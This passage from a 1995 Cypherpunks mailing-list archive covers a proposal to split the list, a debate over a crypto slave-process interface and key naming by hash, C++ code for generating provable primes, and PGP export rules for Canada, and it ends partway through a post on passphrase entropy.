It is much more efficient of list bandwidth to post short pointers only, of the style John Young posts. Or an alternative I have been thinking might be useful: a separate list.

The proposal: a separate list for current-event reports/news/reposts.

I think it would be useful if a separate mailing list were set up on toad.com, called say "cypherpunks-news at toad.com" (or whatever) to distinguish it from the main cypherpunks list.

That way people who aren't interested to read reposts just don't subscribe to cypherpunks-news, and those who want to catch up on cypherpunks related current events, media reports etc, can browse through the archives for cypherpunks-news.

What do others think?

Adam

From wb8foz at nrk.com Wed Nov 22 10:30:41 1995
From: wb8foz at nrk.com (David Lesher)
Date: Thu, 23 Nov 1995 02:30:41 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To:
Message-ID: <199511220222.VAA00560@nrk.com>

>
> The FBI's "requirements" present an entertaining set of logistical
> problems. Simply equipping the switches to handle the extra capacity,
> especially during busy hour, is problematic.

The sources I consulted were nowhere near as restrained. "Out of their trees" was the most concise reply I heard.

And *this* was from someone WORKING in the FI community in technical areas.
--
A host is a host from coast to coast.................wb8foz at nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

From fstuart at vetmed.auburn.edu Wed Nov 22 10:47:39 1995
From: fstuart at vetmed.auburn.edu (Frank Stuart)
Date: Thu, 23 Nov 1995 02:47:39 +0800
Subject: Spam the Sign!
Message-ID: <199511221816.MAA13933@snoopy.vetmed.auburn.edu>

>[regarding suggestion that netscape give mit or someone a 128 bit version
>to place on an ftp server]
>
>This is not an apology for the ITAR, just my usual lawyerly overcaution:
>
>Suppose A gives B a program that is export controlled, intending for B to
>allow it to be exported. Has A conspired with B to export the program?
>
>Let's ask the grand jury investigating Phil....

That's a possible problem, I suppose, but wouldn't you be protected if your license agreement with MIT (or whoever) specified redistribution "for domestic use only"?

                           | (Douglas) Hofstadter's Law:
Frank Stuart               | It always takes longer than you expect, even
fstuart at vetmed.auburn.edu | when you take into account Hofstadter's Law.

From raph at c2.org Wed Nov 22 10:50:14 1995
From: raph at c2.org (Raph Levien)
Date: Thu, 23 Nov 1995 02:50:14 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <9511221641.AA14712@tis.com>
Message-ID:

On Wed, 22 Nov 1995, Carl Ellison wrote:

> >Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST)
> >From: Raph Levien
>
> > I propose that the new interface lives as a sort of daemon, rather
> >than a static collection of command line script pieces.
>
> Danger, Will Robinson! (see below)

In retrospect, "daemon" was a poor choice of words to describe my proposal. "Slave process" gets the idea across much better, but may be a bit less PC.

A daemon sits on a publicly accessible port, such as a TCP/IP socket.
The slave process is only accessible to the user who invoked it (enforced by the OS's file permissions). Further, it only gives secrets to individual processes that authenticated themselves first (by sending a passphrase down the connection to the slave process). > > Once the negotiation has been established, the application can send > >the daemon MIME objects that the app does not understand but the > >daemon does (for example, an image/fractal). The daemon can return a > >MIME object that the app does understand (for example, an image/ppm). > > This part sounds good...a sort of master translation service. I'm glad you like it! > > Alternatively, the daemon may request an authentication. This is > >useful when resolving external bodies that require authentication, > >including non-anonymous FTP, and standard authenticated HTTP. In this > >case, the daemon sends a message to the app requesting the > >authentication. It specifies whether it needs both username and > >password, or just password. In the latter case, it hands a username to > >the application. > > The application can then query the user for the authentication > >data. It hands this back to the daemon. In reply, the daemon indicates > >success or failure. In case of success, it hands the object back to > >the app. > > Now I get worried. This communication with the demon is via some IPC -- > maybe even via a LAN. Some things can't be distributed safely and > authentication is #2 on my list. No, the communication is not via a LAN. On a Unix system, the communication is through Domain Sockets. Both processes live on the same machine, and the socket "lives" on the local file system. I submit that my proposal is every bit as secure as, say, PGP is now. If you can't trust the operating system not to hand domain sockets from one process to another, then you certainly can't trust it to, for example, substitute different binaries for the crypto program (an attack which Ian et al cleverly mounted a few weeks ago).
If it were not the case that my proposal was as secure as PGP, then I would want to withdraw it. However, the proposal has so many advantages that I would want to see a serious description of the attack, rather than just feelings of endangerment to Will Robinson. > > Encryption is a bit more tricky, but in essence you just hang a > >premail-alike off this kind of protocol. The hard part is specifying > >the key, but you just call it a "parameter" and put in hooks for the > >daemon to ask for whatever parameters it needs. > > Crypto keys are #1 on my list of things you can't distribute (unless they > are wrapped, of course). I should have made it clearer that I am referring to public keys. If public keys are on the list of things that can't be distributed, then I believe we are in trouble. > > This requires that > >keys have some nonforgeable names, which is unfortunately not a > >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the > >Certification Authority ( at Nick Szabo). > > Public keys, if that's what you're talking about, have perfectly good > nonforgeable names -- themselves. They are unique. They are the proper > name which can collect all the attributes of that key which are of interest > (e.g., permission to spend $, name of a human who knows the private key, > attributes about that human, etc.). Ok. But public keys have one serious disadvantage: their size. I can't put a public key on my business card or read it over the phone. I want an unforgeable key name. I want this to be the standard key name in the interface between the application and the crypto engine. I want users to be able to specify them directly, at the very least to bootstrap the public key infrastructure. I propose using the MD5 hash of the whitespace-free MOSS representation of the public key, in hex. It's simple enough to be described in one sentence, but does everything I want.
Note that PGP 2.6.2 does _not_ allow the use of a public key as the name of a public key, unless you do a horrible hack such as replace the pubring.pgp file with the one public key of interest. This is a significant problem when trying to identify which key signed a signed message. I haven't bashed around with TISMOSS enough, but I'm not sure it will allow this either. I got the impression that it preferred the use of an alias. > > One final aside: I've been fairly frustrated with this mailing list > >as a forum for talking about real design proposals and implementation > >issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless > >tend to attract far more attention than real crypto work. I want a > >forum for, and just for, cypherpunks who write code. If I had just a > >smidgen more free time (as if), I'd be trying to start one > >myself. Anyone else? > > I've seen this happen several times. As a list gets popular, it > diversifies. You might try sci.crypt.research -- since it's moderated. Thanks for the suggestion. However, my concerns are with implementation and deployment, not research. I am perfectly willing to consider cryptographic algorithms to be black boxes that do what they say they will. I think the charter exists to start a new list. John Gilmore has already offered to start a "coderpunks" list on toad.com. Shall we take him up on it? Raph From anonymous-remailer at shell.portal.com Wed Nov 22 10:56:06 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 23 Nov 1995 02:56:06 +0800 Subject: No Subject In-Reply-To: Message-ID: <199511221809.KAA21408@jobe.shell.portal.com> > Romania or Bulgaria, or even Russia. They may still have > the old listening infrastructure in place, although I > hear that Stasi headquarters in the former DDR is now an > acupuncture clinic. The Stasi listening infrastructure wasn't solely in their headquarters. 
Listening stations for terrestrial frequencies were spread along the borders, notably here is the station on the Brocken, a mountain in the Harz. The central station for interception of satellite traffic (read: international telephone communication, even when not entering or leaving the country) was located in Biesenthal, a small town near Berlin. It's hard to reconstruct what part of interception took place in the Stasi HQ, my guess is that all international telephone traffic leaving or entering the country was intercepted there. For technical reasons it was impossible to intercept all domestic traffic from a single central location, the telephone system worked on a purely mechanical basis. It seems that almost all of the telephone surveillance equipment was destroyed during the revolution or shortly after. Things look different for the mentioned radio equipment. The Stasi used a combination of Russian and self-made technology. The top-of-the-notch Russian equipment is back in Russia. But most of the Russian equipment was sold by the Russian guards (their pay is _really_ low, even more so when compared to western money), the Stasi equipment was forgotten about and eventually stolen. This equipment is now mainly in the hands of about 3 or 4 individuals. From weidai at eskimo.com Thu Nov 23 03:08:12 1995 From: weidai at eskimo.com (Wei Dai) Date: Thu, 23 Nov 95 03:08:12 PST Subject: generating provable primes Message-ID: Several days ago someone (I forgot who he was) asked about code for primality tests. I just implemented an algorithm to generate random provable primes that is only about 50% slower than generating probable primes. It will be in the next version of Crypto++, but I've attached code for the main function in case anyone is interested in the algorithm. Full description can be found in "Fast Generation of Prime Numbers and Secure Public-Key Cryptographic Parameters" by U.M. Maurer in Journal of Cryptology, Volume 8 Number 3, 1995. 
The paper also describes a more complicated algorithm that produces primes with a more uniform distribution.

There was discussion some days ago about generating strong primes for DH exchange moduli. Eric Young reported that he spent tens of hours of CPU time to generate a 4096 bit prime p such that (p-1)/2 is also prime. However, there is really no reason why DH exchange moduli must be of the form 2q+1 where q is a prime. It should be sufficient that they are of the form rq+1, where q is a large enough prime (say more than 256 bits). The following algorithm generates a provable prime p=2rq+1, where q is a prime with at least half the length of p.

bignum ProvablePrime(RandomNumberGenerator &rng, unsigned int bits)
{
    const unsigned smallPrimeBound = 29, c_opt=10;
    bignum p;

    BuildPrimeTable();
    if (bits < smallPrimeBound)
    {
        // Small case: draw odd candidates of exactly `bits` bits until trial
        // division up to 2^((bits+1)/2), which is at least sqrt(p), finds no divisor.
        do
            p.Randomize(rng, bignum::Power2(bits-1), bignum::Power2(bits)-1, ODD);
        while (TrialDivision(p, 1 << ((bits+1)/2)));
    }
    else
    {
        const unsigned margin = bits > 50 ? 20 : (bits-10)/2;
        double relativeSize;
        // Choose the size of q relative to p, between 0.5 and 1, and retry
        // until q comes out more than `margin` bits shorter than p.
        do
            relativeSize = pow(2.0, double(rng.GetLong())/0xffffffff - 1);
        while (bits * relativeSize >= bits - margin);

        bignum a,b;
        // Recursively generate the provable prime q.
        bignum q = ProvablePrime(rng, unsigned(bits*relativeSize));
        bignum I = bignum::Power2(bits-2)/q;
        bignum I2 = I << 1;
        unsigned int trialDivisorBound = (unsigned int)min((unsigned long)primeTable[primeTableSize-1], (unsigned long)bits*bits/c_opt);
        boolean success = FALSE;
        do
        {
            // Candidate p = 2*r*q + 1, with r drawn between I and I2.
            p.Randomize(rng, I, I2, ANY);
            p *= q; p <<= 1; ++p;
            if (!TrialDivision(p, trialDivisorBound))
            {
                // With b = a^((p-1)/q) mod p, accept p only if gcd(b-1, p) == 1
                // and b^q mod p == 1, i.e. a^(p-1) == 1 (mod p).
                a.Randomize(rng, 2, p-1, ANY);
                b = a.ExponentiateMod((p-1)/q, p);
                success = (Gcd(b-1, p) == 1) && (b.ExponentiateMod(q, p) == 1);
            }
        }
        while (!success);
    }
    return p;
}

From perry at piermont.com Wed Nov 22 11:08:15 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 23 Nov 1995 03:08:15 +0800 Subject: PROPOSAL: cypherpunks-news@toad.com?
(was: rand-test) In-Reply-To: <5579.199511221742@olib> Message-ID: <199511221828.NAA21403@jekyll.piermont.com> A.Back at exeter.ac.uk writes: > It is much more efficient of list bandwidth to post short pointers > only, of the style John Young posts. I agree with you. John's posts are not always strictly on topic but they are always just pointers, and he typically posts them in a single group a day. They are also always very high quality information. I find them to be perfectly fine. The recent "Friend;" stuff just annoyed me, though. Perry From cme at TIS.COM Wed Nov 22 11:11:00 1995 From: cme at TIS.COM (Carl Ellison) Date: Thu, 23 Nov 1995 03:11:00 +0800 Subject: Design proposal: crypto-capable generic interface Message-ID: <9511221840.AA24587@tis.com> >Date: Wed, 22 Nov 1995 10:11:00 -0800 (PST) >From: Raph Levien >Subject: Re: Design proposal: crypto-capable generic interface >Message-Id: > In retrospect, "daemon" was a poor choice of words to describe my >proposal. "Slave process" gets the idea across much better, I'm a great fan of programming by cooperating processes -- but I still worry when it comes to crypto. What we need to do, if we want real security, is hold all the crypto secrets (therefore the crypto itself) in a device (PCMCIA card?) in the physical possession of the user. The cooperating-process model could make that easier -- but, if designed wrong, it could call for the device to give up a secret to be sent by IPC over to the slave process. >> > This requires that >> >keys have some nonforgeable names, which is unfortunately not a >> >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the >> >Certification Authority ( at Nick Szabo). >> >> Public keys, if that's what you're talking about, have perfectly good >> nonforgeable names -- themselves. They are unique.
They are the proper >> name which can collect all the attributes of that key which are of interest >> (e.g., permission to spend $, name of a human who knows the private key, >> attributes about that human, etc.). > > Ok. But public keys have one serious disadvantage: their size. [...] > I propose using the MD5 hash of the whitespace-free MOSS >representation of the public key, in hex. It's simple enough to be >described in one sentence, but does everything I want. That sounds fine -- but why deal with a text MOSS representation? It's the modulus which is unique -- so just hash the binary bytes of the modulus, MSB first. There's no need to force anyone checking a key to have all the MOSS printing software in the loop. You might also consider using SHA instead of MD5 -- but that adds to the character count on your business card. [I printed up my own business cards with PGP fingerprints for my 2 primary keys -- and it took up about 1/4 of the card, in a readable font.] > Note that PGP 2.6.2 does _not_ allow the use of a public key as the >name of a public key, unless you do a horrible hack such as replace the >pubring.pgp file with the one public key of interest. PGP keyring structures do use the key as its own name, I believe. The UserID is a separate entity, associated with the stand-alone key. A signature applies to a pair (UserID,Key). If I could change the PGP keyring structure, I'd add a new entity -- an Attribute block -- a string and my key ID, with a signature on the Attribute+ObjectKey. This can be done today with the UserID and signature -- and I've even tried it. It works, but PGP is used to accessing keys by the text in a UserID field and that's not appropriate. The Attribute would give a statement I'm prepared to stand by, giving testimony about the key being signed or the person who has demonstrated the ability to sign something I've verified with that key. We might need to add something like MOSS's aliases, for my use only, to let me access keys. 
If I know someone as Bobby -- that's an association in my own head -- not applicable to anyone else. When I access him by that alias, that's for my use. Therefore, only I should define it and only I should sign the association. This is what I'd use instead of PGP's UserID blocks -- alias blocks. I commend TIS/MOSS's aliases to people's study. The MOSS guys have used the alias structure not only to define nicknames of importance only to me but also to define crypto-lists (like mailing lists). Needless to say, the assignment of aliases needs to be protected. An attacker mustn't be allowed to slip a new alias and/or new key into your ring -- especially if it's a crypto-list definition. > Thanks for the suggestion. However, my concerns are with >implementation and deployment, not research. I am perfectly willing to >consider cryptographic algorithms to be black boxes that do what they say >they will. I think the charter exists to start a new list. John Gilmore >has already offered to start a "coderpunks" list on toad.com. Shall we >take him up on it? My suggestion is that if you want this limited in content, it'll have to be moderated. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme | |Trusted Information Systems, Inc. http://www.tis.com/ | |3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2| |Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 | +--------------------------------------------------------------------------+ From mdiehl at dttus.com Wed Nov 22 12:13:58 1995 From: mdiehl at dttus.com (Martin Diehl) Date: Thu, 23 Nov 1995 04:13:58 +0800 Subject: PROPOSAL: cypherpunks-news@toad.com? Message-ID: <9510228170.AA817074264@cc3.dttus.com> On 11/22/95, Adam Writes: > Perry Metzger writes: > > "James M. Cobb" writes: > > > Friend, > > > > > > > > > The following information from > > > > 1) You are not my friend. 
> > > > 2) My private mail to you hasn't convinced you to stop this > > barrage of reposts. Would you please do so? > I am inclined to agree with Perry in as much as the volume of posts > to the cypherpunks list is greatly increased by reposts of news from > other mailing lists, USENET newsgroups, WWW sources, newspapers, TV > programs, films, books, talks, etc. While some of the information > posted is interesting, and relevant, some others are less relevant, > bordering on noise. [SNIP] > The proposal: a separate list for current-event > reports/news/reposts. [SNIP] > What do others think? > Adam This is what I think about setting up an additional list: 1. If I subscribe to both lists, it won't change my eMail traffic 2. If the "news, NOISE, off-topic" posts are sent to both lists, my eMail volume will increase 3. The cypherpunks subscribers are not the problem 4. What Adam and Perry (and others) want is that the "news, NOISE, off-topic" posters change their behavior and not post long news items verbatim. 5. How are you going to get those posters to agree to change? My vote, for what it's worth, is don't split the list. It won't work because the extra posts ARE going to go to this list because that's where they believe their readers are. Martin G. Diehl From ses at tipper.oit.unc.edu Wed Nov 22 12:21:54 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Thu, 23 Nov 1995 04:21:54 +0800 Subject: Secrets of the Internet In-Reply-To: <199511221933.OAA12393@pipe1.nyc.pipeline.com> Message-ID: On Wed, 22 Nov 1995, tallpaul wrote: > > Turing killed himself after being dogged by the UK's intelligence > establishment over his sexual orientation. Ain't no way they're going to > unfreeze *him* to work on the issue of "kiddie porn." You still believe that cover story? :-) From froomkin at law.miami.edu Wed Nov 22 12:36:28 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Thu, 23 Nov 1995 04:36:28 +0800 Subject: Spam the Sign! 
In-Reply-To: <199511221816.MAA13933@snoopy.vetmed.auburn.edu> Message-ID: On Wed, 22 Nov 1995, Frank Stuart wrote: > >[regarding suggestion that netscape give mit or someone a 128 bit version > >to place on an ftp server] > > > >This is not an apology for the ITAR, just my usual lawyerly overcaution: > > > >Suppose A gives B a program that is export controlled, intending for B to > >allow it to be exported. Has A conspired with B to export the program? > > > >Let's ask the grand jury investigating Phil.... > > That's a possible problem, I suppose, but wouldn't you be protected if > your license agreement with MIT (or whoever) specified redistribution > "for domestic use only"? > "protected"? No. "Helped"? Yes. The government can argue to the jury that the agreement was a sham and you knew it.... A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From bplib at wat.hookup.net Thu Nov 23 04:39:11 1995 From: bplib at wat.hookup.net (Tim Philp) Date: Thu, 23 Nov 95 04:39:11 PST Subject: PGP in Canada In-Reply-To: Message-ID: You can try to get PGP from the MIT site but it may not allow you to do so if it does not recognize your address as being Canadian. I tried to get PGP-Phone and it told me that it did not think that I was a Canadian. I wrote to the administrator but have never received a reply. I checked about a week ago and I still could not get the file. Tim Philp =================================== For PGP Public Key, Send E-mail to: pgp-public-keys at swissnet.ai.mit.edu In Subject line type: GET PHILP =================================== From tallpaul at pipeline.com Wed Nov 22 12:42:43 1995 From: tallpaul at pipeline.com (tallpaul) Date: Thu, 23 Nov 1995 04:42:43 +0800 Subject: Secrets of the Internet Message-ID: <199511221933.OAA12393@pipe1.nyc.pipeline.com> On Wed.
22 Nov 1995 Simon Spero wrote in "Re:SEcrets of the Internet" that we should "never underestimate the power of GCHQ -- when they unfreeze Alan Turing from the cryogenic vault, good things happen." Not to worry. Turing killed himself after being dogged by the UK's intelligence establishment over his sexual orientation. Ain't no way they're going to unfreeze *him* to work on the issue of "kiddie porn." From perry at piermont.com Wed Nov 22 12:43:28 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 23 Nov 1995 04:43:28 +0800 Subject: "Dear Newt" Letter... In-Reply-To: <9511210055.AA29106@zorch.w3.org> Message-ID: <199511220100.UAA17883@jekyll.piermont.com> hallam at w3.org writes: > > >Er, Newt was the one who railed against the Exon censorship bill, and > >who's said in public that clipper is unrealistic. > > And where does that get us? Did Newt stop the Exon bill in its tracks? > Did he do anything to stop the wiretap bill? And what did any of the Democrats do? Anyone who thinks that Democrats are "better" for privacy and personal freedom than Republicans has probably been taking very high quality drugs indeed. A Democratic president has been pushing Clipper -- Senator Exon is a Democrat. .pm From x93ojg at juliet.stfx.ca Wed Nov 22 12:44:54 1995 From: x93ojg at juliet.stfx.ca (Still) Date: Thu, 23 Nov 1995 04:44:54 +0800 Subject: PGP Message-ID: Does anyone know what the laws are regarding the export of PGP into Canada? I know that it is not allowed to be exported overseas but what is the ruling on into Canada. Some sites say that it can be exported into Canada and others say that it can't. Can anyone out there give me some information on this topic? -- T H E M A N , T H E M Y T H , T H E L E G E N D . ****************************************************************************** * Dylan "Still" Boudreau * Knowledge is proud that she knows so much; * * Internet: x93ojg at stfx.ca * Wisdom is humble that she knows no more.
* ****************************************************************************** * Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html * ****************************************************************************** When someone says, "That's a good question." You can be sure it's a lot better than the answer you're going to get. From x93ojg at juliet.stfx.ca Wed Nov 22 12:52:36 1995 From: x93ojg at juliet.stfx.ca (Still) Date: Thu, 23 Nov 1995 04:52:36 +0800 Subject: PROPOSAL: cypherpunks-news@toad.com? In-Reply-To: <9510228170.AA817074264@cc3.dttus.com> Message-ID: On Wed, 22 Nov 1995, Martin Diehl wrote: > My vote, for what it's worth, is don't split the list. It won't work > because the extra posts ARE going to go to this list because that's > where they believe their readers are. > I have got to agree with Martin. If you split the group a lot of us are going to subscribe to both groups so when people submit this stuff and cross post it we are going to get two copies of the same message. I think I can speak for most people when I say that I don't need that extra mail volume. -- T H E M A N , T H E M Y T H , T H E L E G E N D . ****************************************************************************** * Dylan "Still" Boudreau * Knowledge is proud that she knows so much; * * Internet: x93ojg at stfx.ca * Wisdom is humble that she knows no more. * ****************************************************************************** * Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html * ****************************************************************************** When someone says, "That's a good question." You can be sure it's a lot better than the answer you're going to get.
From raph at c2.org Wed Nov 22 12:59:14 1995 From: raph at c2.org (Raph Levien) Date: Thu, 23 Nov 1995 04:59:14 +0800 Subject: Design proposal: crypto-capable generic interface In-Reply-To: <9511221840.AA24587@tis.com> Message-ID: On Wed, 22 Nov 1995, Carl Ellison wrote: > >Date: Wed, 22 Nov 1995 10:11:00 -0800 (PST) > >From: Raph Levien > >Subject: Re: Design proposal: crypto-capable generic interface > >Message-Id: > > > > > In retrospect, "daemon" was a poor choice of words to describe my > >proposal. "Slave process" gets the idea across much better, > > I'm a great fan of programming by cooperating processes -- but I still > worry when it comes to crypto. What we need to do, if we want real > security, is hold all the crypto secrets (therefore the crypto itself) in a > device (PCMCIA card?) in the physical possession of the user. The > cooperating-process model could make that easier -- but, if designed wrong, > it could call for the device to give up a secret to be sent by IPC over to > the slave process. What I am getting from you is "worry." This does not convince me. I want solid technical criticism. Sorry for being so harsh, but that's how I feel. In fact, I propose that the security of the "slave process" model is _better_ than the realistic alternatives. Without it, the application stuff (for example, displaying pretty MIME content) and the crypto stuff must share an address space. A bug in the application stuff could corrupt or compromise the crypto data structures. As we have seen demonstrated several times, it is just not practical to build large, complex applications which are worthy of the highest level of trust. Factoring it into two processes helps. Tokens are nice, but I think there's a lot to be said for software solutions as well. At the very least, I don't consider the existence of tokens to be an argument that software crypto systems shouldn't be built.
> >> > This requires that > >> >keys have some nonforgeable names, which is unfortunately not a > >> >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the > >> >Certification Authority ( at Nick Szabo). > >> > >> Public keys, if that's what you're talking about, have perfectly good > >> nonforgeable names -- themselves. They are unique. They are the proper > >> name which can collect all the attributes of that key which are of interest > >> (e.g., permission to spend $, name of a human who knows the private key, > >> attributes about that human, etc.). > > > > Ok. But public keys have one serious disadvantage: their size. > [...] > > > I propose using the MD5 hash of the whitespace-free MOSS > >representation of the public key, in hex. It's simple enough to be > >described in one sentence, but does everything I want. > > That sounds fine -- but why deal with a text MOSS representation? It's the > modulus which is unique -- so just hash the binary bytes of the modulus, > MSB first. There's no need to force anyone checking a key to have all the > MOSS printing software in the loop. You might also consider using SHA > instead of MD5 -- but that adds to the character count on your business > card. [I printed up my own business cards with PGP fingerprints for my 2 > primary keys -- and it took up about 1/4 of the card, in a readable font.] I would accept SHA as a reasonable alternative. Using the modulus alone is not good enough. A bogus key with the same modulus and a different exponent could be used to mount a denial-of-service attack. Note that the PGP 2.6.2 key fingerprint scheme suffers from a similar problem; since the sizes of the modulus and exponent fields are not included in the hash, it is possible to generate bogus keys with the same fingerprint. Specifying the key size and fingerprint together is, however, unforgeable. I looked at the MOSS representation of the key (I'm talking PK's here only, not all the X.509 stuff).
I don't think it would be that hard to code. > > Note that PGP 2.6.2 does _not_ allow the use of a public key as the > >name of a public key, unless you do a horrible hack such as replace the > >pubring.pgp file with the one public key of interest. > > PGP keyring structures do use the key as its own name, I believe. The > UserID is a separate entity, associated with the stand-alone key. A > signature applies to a pair (UserID,Key). I was referring to the interface that PGP presents to the outside world, not its internal keyring structures. These issues come up whenever using PGP from the command line, or trying to interface it with other applications. > If I could change the PGP keyring structure, I'd add a new entity -- an > Attribute block -- a string and my key ID, with a signature on the > Attribute+ObjectKey. This can be done today with the UserID and signature > -- and I've even tried it. It works, but PGP is used to accessing keys by > the text in a UserID field and that's not appropriate. The Attribute would > give a statement I'm prepared to stand by, giving testimony about the key > being signed or the person who has demonstrated the ability to sign > something I've verified with that key. I understand that Matt Blaze's forthcoming "Policymaker" will do all this and more. > We might need to add something like MOSS's aliases, for my use only, to let > me access keys. If I know someone as Bobby -- that's an association in my > own head -- not applicable to anyone else. When I access him by that > alias, that's for my use. Therefore, only I should define it and only I > should sign the association. This is what I'd use instead of PGP's > UserID blocks -- alias blocks. > > I commend TIS/MOSS's aliases to people's study. The MOSS guys have used > the alias structure not only to define nicknames of importance only to me > but also to define crypto-lists (like mailing lists). > > Needless to say, the assignment of aliases needs to be protected. 
An > attacker mustn't be allowed to slip a new alias and/or new key into your > ring -- especially if it's a crypto-list definition. This is fine, but it's one more thing to manually maintain. How is the user going to verify that the alias is really right? This is another place where a 32- (or 40-) hex digit unique name would come in handy. > > Thanks for the suggestion. However, my concerns are with > >implementation and deployment, not research. I am perfectly willing to > >consider cryptographic algorithms to be black boxes that do what they say > >they will. I think the charter exists to start a new list. John Gilmore > >has already offered to start a "coderpunks" list on toad.com. Shall we > >take him up on it? > > My suggestion is that if you want this limited in content, it'll have to be > moderated. I agree that a moderated list would be better, but I do not have the time to do it myself. One suggestion that I think is very good is to moderate on the basis of sender, rather than message. The best way to do this would be to keep a keyring of "approved" senders, and match the signature of each message against the keyring. As I say, I'm not volunteering, but if somebody else was so moved, I think it would be a valuable service. Raph From hfinney at shell.portal.com Wed Nov 22 13:00:59 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 23 Nov 1995 05:00:59 +0800 Subject: towards a theory of reputation In-Reply-To: Message-ID: <199511222024.MAA09897@jobe.shell.portal.com> I don't have time to write much now, but I got a request for information on the Prisoner's Dilemma problem, so I did a web search, and found an interesting sounding paper at . I have not read it yet, but according to the web page this adds to the traditional PD simulations the feature that participants can choose whom to interact with (rather than having to interact with everyone or with a random other program).
Maybe "reputation" would be more important in such a simulation since the element of choice seems to be one of the key areas where reputation matters. I'll try to read the paper over the holidays, but it sounds like it might be relevant. Hal From sunder at amanda.dorsai.org Wed Nov 22 13:25:35 1995 From: sunder at amanda.dorsai.org (Ray Arachelian) Date: Thu, 23 Nov 1995 05:25:35 +0800 Subject: Visual Basic 4.0 encryption prog. In-Reply-To: <01BAB5D0.4CBEAEE0@king1-04.cnw.com> Message-ID: On Sat, 18 Nov 1995, Eric Anderson wrote: > I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. I plan on buying Applied Cryptography probably on Fri. when I get paid. > My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the shelf > code. > So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler. > I don't really care about ITAR or any of that other BS, I just won't put MY name on it. You've already put your name on it by asking this question and providing so much detail on what tools you would use and what you want to do. :-) But there is no reason why this isn't possible in ANY language. You'll just have to write a lot of code by hand, or port to VB... especially the large-number routines. ========================================================================== + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | _ |> \|/ |sunder at dorsai.org| Where day by day, yet another | \ | <--+-->| | Constitutional right vanishes. 
| \|
/|\ | Just Say | | <|\
+ v + | "No" to the NSA!| Jail the censor, not the author!| <| n
===================http://www.dorsai.org/~sunder/=========================

From rmartin at aw.sgi.com Wed Nov 22 13:40:00 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Thu, 23 Nov 1995 05:40:00 +0800
Subject: PGP in Canada
In-Reply-To:
Message-ID: <9511221544.ZM6977@glacius.alias.com>

-----BEGIN PGP SIGNED MESSAGE-----

Please take all of the following as being my statements of what I think, not statements of absolute truth. [That is, call the CEC yourself.]

It is legal for a Canadian citizen to import PGP into Canada under Canadian law. It is legal to use either the international or yanqui versions in Canada--software patents don't apply [I don't think].

It is legal for an American to give pgp to an American citizen, a permanent legal resident alien of the United States, or to a Canadian citizen, providing the receiver is in Canada or the United States.

It is *illegal* for a Canadian to export pgp anywhere except the U.S., if the pgp came from the U.S. and no substantial changes have been made to it.

For more docs, see http://www.io.org/~samwise/crypto/ [yes, I know, it hasn't changed in a while, and there's some stuff missing [such as the Area Control List], but the most important thing on that web page is the information about who to ask: there's an office in Halifax]

My recommendation: get the international version of PGP. [Unless, of course, the above statements are wrong, in which case my reasoning in favour of the international version is faulty.]
richard

- --
Richard Martin I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

From sjb at universe.digex.net Wed Nov 22 13:43:33 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Thu, 23 Nov 1995 05:43:33 +0800
Subject: Repeated Words/characters in Password/Phrase
In-Reply-To:
Message-ID: <199511222102.QAA10377@universe.digex.net>

Timothy C. May writes:
>At 11:11 PM 11/14/95, Ted Cabeen wrote:
>>Do repeated words in a PGP passphrase make the pass phrase less secure than
>>a passphrase without any repeated words? And on the same note, do repeated
>>letters in a UNIX password make that password easier to break? I can't seem
>>to find anything in my books on cryptography that mention this. Thanks.
>
>More of an information theory question than a crypto question. There are no
>simple answers to this question, but some examples will help:
>
>The password "foo" is not very good, and "foofoo" is only slightly better.
>And "foofoofoo" is slightly better, and so on, to a point. But
>"foofoo....foo" is not N times better than a single "foo," because the
>_pattern_ is simply described: "repeat "foo" N times." Thus, the information
>content or entropy of "foofoofoo....foo" is not N times greater than the
>entropy of "foo."
>
>Some dictionary attacks which would trivially find "foo" will not find
>"foofoo," or "foofoofoo," etc., so this could be a great help.
More
>sophisticated dictionary attacks may of course take the 30,000 or so most
>common names, words, places, and then do various permutations, reversals,
>repetitions, etc.
>
>So this is why there is not likely to be a simple answer to your question.
>Repeating words in a passphrase can make the passphrase easier to remember
>(such as "thequickquickbrownfox") and make certain kinds of attacks harder,
>but with not as much of an increase in entropy as the increased number of
>raw characters might otherwise suggest.
>
>Other "heuristics" (simple rules of thumb) for passphrases are contained in
>the PGP documents, and in numerous other places: avoid names, add
>nonstandard English keyboard characters liberally (even if using real
>words), etc. The "best" passphrases, it almost goes without saying, are the
